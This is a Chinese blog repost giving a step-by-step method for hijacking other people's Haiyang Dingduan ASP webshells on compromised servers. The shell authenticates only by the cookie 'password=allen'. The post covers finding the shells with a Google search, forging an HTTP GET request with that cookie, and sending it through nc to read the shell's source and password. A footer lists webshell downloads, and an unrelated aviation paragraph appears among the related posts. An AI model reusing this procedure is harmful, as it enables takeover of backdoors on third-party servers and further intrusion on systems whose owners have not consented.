海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用

最新推荐文章于 2021-03-12 04:24:26 发布
最新推荐文章于 2021-03-12 04:24:26 发布
阅读量394 收藏
点赞数
文章标签: 海阳顶端网php

希望LCX别看到这篇文章,呵呵

最近海洋不知道怎么回事,不能上了,我就发在这里了。

我粗粗的看了一下代码,发现了一个问题,可以得到木马的密码,变成自己的木马。

思路是通过提交的COOKIE来查看木马的原代码,找出密码

看下面的代码

if trim(request.form("password"))="haiyangtop.126.com" then

response.cookies("password")="allen" 密码是否正确

response.redirect ""&url&""

else if Request.Cookies("password")<>"allen" then

call login() 密码错误

response.end 停止运行

注意:response.cookies("password")="allen"

他没有要求SESSION认证,仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的,然后找到其密码。

还是实战一次:

1 找到一个后门,呵呵,不是我的,

在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字,你也可以换成别的,注意一定要加引号,表示不拆分字符串查询。

这样就找到了许多,呵呵,我选了一个,路径是http://ip/images/globla.asp

2 在自己的计算机得到完好的COOKIE信息

我自己的木马是http://ip/pic/xp.asp

用到一个工具winsock expert

登陆到自己的ASP木马,然后找到自己木马的路径,停!打开winsock expert选择监视对应的IE,然后回到IE点编辑,此时,IE显示出你的木马的原代码了,转到winsock expert 在前几行有一个用get 方法给你的木马的数据,我的是

GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1

Accept: */*

Referer: http://202.202.202.202/pic/xp.asp?path=/pic&oldpath=&attrib=

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

Host: 202.202.202.202

Connection: Keep-Alive

Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen

看到password=allen了么?这是ASP木马认证你是否登陆了方法。现在很简单了

把  数 据中所有的 ip 和路径改为别人的木马路径。还要将

GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1

中的PATH=后的值改为别人的木马路径。

我找的木马是http://ip/images/globla.asp

所以我改后的数据是

GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1

Accept: */*

Referer: http://202.202.202.202/images/globla.asp?path=/images&oldpath=&attrib=

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

Host: 202.202.202.202

Connection: Keep-Alive

Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen

好了,保存在文本。

3 提交我们的数据

进入命令行,进入NC的目录,键入命令

nc -vv 202.202.202.202 80 >1.txt

>1.txt 表示将返回的信息保存在同目录的1.txt

一定要在CMD下键入命令,直接打开NC无法保存数据

呆会会提示连接成功,然后我门将作好的COOKIE粘贴在里面,然后按两次回车。

实际这时我门就通过了他的 验证并请求木马的原代码。

然后在同目录下1.txt就看到了木马的原代码,

修改下面的haiyangtop.126.com改为你密码

if trim(request.form("password"))="23kodf@" then

哈哈,看到密码了,然后登陆吧,再改了密码,这个木马就是你的了。

俗话说了,黑窝更应该加强安全警戒,海洋顶端木马应用的范围很广,希望作者能尽快改进,添加session认证,使其更安全!

lcx:写的海阳顶端网的总是写得非常好呀。这个漏洞我很早就知道了,但利用方法没想到你做得这么巧妙!!精彩。2003版漏洞更大,上传根本不需要密码。

其实,原来写的时候,只是将别人的一些代码组织在一块儿,根本没有考虑密码的问题,只是做为一个后门。用了个密码,只是区分fso和非fso。

还要说明一点的是,我和allen不会对这个木马再做任何改动了。

整天将别人的源码组合来组合去,还要回答无穷无尽的关于菜鸟对这个asp木马的使用方法,谁还改呀~

周春花
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
海阳顶端进百度blog必须输入密码的vbscript代码
09-06
本问题中提到的代码是关于海阳顶端博客的一个特定登录机制,它使用VBScript编写了一个简单的密码验证功能。下面将详细解析这段代码的工作原理和涉及的知识点。 首先,`strreverse`函数是VBScript中的一个内建函数...
海阳顶端马2006官方正式版发布
02-28
1. `2006P.asp`:这可能是一个ASP(Active Server Pages)脚本文件,用于在服务器端运行,可能包含了程序的核心功能代码,如马的扫描、识别和防御机制。 2. `2006P_BIG5.asp`:与前一个文件相似,但后缀名中的...
海洋顶端ASP***相关问题+
weixin_33743248的博客
01-13 91
=文件说明=====================================================2006.asp 海阳顶端ASP***2006版文件unpack.vbs 打包文件"HYTop.mdb"的解开器2006X.exe 海阳顶端ASP***2006 C/S...
海阳顶端asp木马2005α版
陈巍@人生态度
08-08 3863
http://www.xfocus.net/tools/200407/2005.rar
海阳顶端php,海阳顶端2006正式版试用小记
weixin_34476045的博客
03-12 168
作者:许子先@[T.I.T]相信大家对海阳顶端ASP木马都不陌生吧,尤其是在现在注入漏洞盛行时期,海阳顶端ASP木马成了不少络高手必备工具。由于它简单易行的操作,也逐渐成为广大菜鸟的宠儿。在大家开学之季,海阳顶端ASP木马也推出了新版本2006版。这个版本在功能上有了明显的改进。增加了好多贴切用户的新功能。如:更详细的服务器信息、修改文件属性功能、文件打包功能(不用RAR)、注册表读取功能...
数据安全:海洋顶端2006+密码编码分析(转)
08-15 130
数据安全:海洋顶端2006+密码编码分析(转)[@more@]海洋顶端是很出名的 ASP 木马,我从红粉佳人版本开始就一直用它,也算是它的fans了,今年海洋顶端出了最新版本也是最后一个版本 —— 2006Plus。身为fans...
[转载]海阳顶端ASP木马@2005α版全部源代码
Nest of Nonsenser
01-07 2405
信息来源:黑客手册"密码第一个是makelove,第二个是haiyangtop.126.com,查找替换这两个单词就可以改成别的密码了%> end if %>BODY {SCROLLBAR-FACE-COLOR: #ffe1e8; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffe1e8; SCROLLBAR-SHADOW-COLOR: #ff9dbb
海阳顶端 2005 官方正式版-ASP源码.zip
12-16
总的来说,【海阳顶端 2005 官方正式版-ASP源码.zip】不仅是一个实际的站解决方案,也是ASP编程技术和站管理的一个历史见证。通过研究和分析这个源码,我们可以学习到ASP的基本语法、站架构设计以及如何在...
海阳顶端 2006+ 正式版-ASP源码.zip
01-24
在《海阳顶端》的源码中,我们可以看到如何利用ASP技术来搭建一个完整的站,包括用户登录、内容管理、数据展示等功能。 解压密码为“www.cqlsoft.com”,这表明该源码可能受到版权保护,使用者在获取和使用时应...
海阳顶端ASP木马反查杀动画教程
01-12
海阳顶端ASP木马反查杀动画教程 学习使用
海洋顶端手动php注射工具v0[1].02hysi.rar
01-08
海洋顶端手动php注射工具v0[1].02hysi.rar
海洋顶端2006用户手册
04-05
海洋顶端2006用户手册
渗透入侵\海洋顶端PHP注射工具.zip
07-15
海洋顶端PHP注射工具
海洋顶端2006+密码编码分析
热门推荐
lake2的专栏
04-27 1万+
海洋顶端是很出名的 ASP 木马,我从红粉佳人版本开始就一直用它,也算是它的fans了,今年海洋顶端出了最新版本也是最后一个版本 —— 2006Plus。身为fans,自然要拿来用用才是,初次使用感觉有了几个变化:界面变了,文件浏览不再是图标形式;所有动作改为POST方式提交;功能增加;……唉呀,赶紧打住,再写就变成广告了^_^海洋顶端以往的各个版本密码都是明文存放的,这回 2006+ 专
海洋顶端2006新版安全解决方案
kendyhj9999的专栏
03-07 714
海洋顶端2006新版安全解决方案 海洋顶端2006新版安全解决方案  -------------------------------------------------------------------------------- 作者:不详  来源于:中国商动  发布时间:2006-1-27 9:56:57  前不久, 我朋友的一台服务器惨遭所谓hacker
海洋ASP木马增加版(修正)
SnakeHu
10-21 2670
[原创]海洋ASP木马增加版(修正)原创作者:TTFCT信息来源:邪恶八进制信息安全团队(www.eviloctal.com)上次放出 海洋ASP木马增加版 后搜集了很多朋友的意见,由于时间较忙,没得及时对程序作修改在这里对大家说SORRY,同时非常感谢无敌师兄提出的好建议和对此马的关注。1:在这个版本中,去掉了原来被人所怀疑的“统计”,
实践团成员向来参观航空的海阳居民开展了精神宣讲活动,展开讲一讲具体细节
最新发布
07-13
当然,我很乐意向您介绍实践团成员参观航空的海阳居民开展精神宣讲活动的具体细节。 实践团成员先前往海阳居民区,他们提前联系了当地社区组织,并获得了支持和合作。在活动当天,他们组织了一场精神宣讲座谈会,邀请了一些航空领域的专家和从业者作为主讲人。 座谈会上,主讲人分享了航空行业的发展历程、技术创新和未来发展趋势。他们讲解了飞行原理、航空器的构造和维护,以及航空安全等相关知识。同时,他们还介绍了一些成功的航空企业和飞行员的故事,激发了居民们对航空事业的兴趣和热情。 除了座谈会,实践团成员还组织了一些互动环节,例如模拟飞行体验、航空器模型展示和问答环节等。这些活动增加了居民们对航空知识的了解,并且让他们有机会亲身体验一些航空技术和设备。 整个宣讲活动的目的是通过向海阳居民普及航空知识,提高他们对航空事业的认知和兴趣,同时也希望能够激发一些年轻人对航空行业的热爱,鼓励他们选择相关的职业发展道路。 希望这些细节能够回答您的问题。如果还有其他问题,欢迎继续提问!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值